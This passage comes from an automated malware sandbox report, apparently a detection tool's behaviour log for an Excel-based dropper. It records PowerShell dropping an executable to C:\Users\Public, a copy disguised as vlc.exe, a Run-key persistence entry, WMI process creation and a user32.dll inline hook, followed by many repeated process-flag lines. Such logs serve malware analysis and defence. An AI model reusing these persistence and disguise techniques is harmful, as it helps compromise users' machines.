          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0041CEB5 push eax; ret 30_2_0041CF08
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0041CF6C push eax; ret 30_2_0041CF72
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0041CF02 push eax; ret 30_2_0041CF08
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0041CF0B push eax; ret 30_2_0041CF72
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0137D0D1 push ecx; ret 30_2_0137D0E4
          Source: initial sampleStatic PE information: section name: .text entropy: 7.97600028112
          Source: initial sampleStatic PE information: section name: .text entropy: 7.97600028112

          Persistence and Installation Behavior:

          barindex
          Creates processes via WMIShow sources
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\oftmhayq.exeJump to dropped file
          Source: C:\Users\Public\oftmhayq.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\oftmhayq.exeJump to dropped file

          Boot Survival:

          barindex
          Drops PE files to the user root directoryShow sources
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\oftmhayq.exeJump to dropped file
          Source: C:\Users\Public\oftmhayq.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLANJump to behavior
          Source: C:\Users\Public\oftmhayq.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeJump to behavior
          Source: C:\Users\Public\oftmhayq.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run vlcJump to behavior
          Source: C:\Users\Public\oftmhayq.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run vlcJump to behavior

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x81 0x1E 0xE0
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
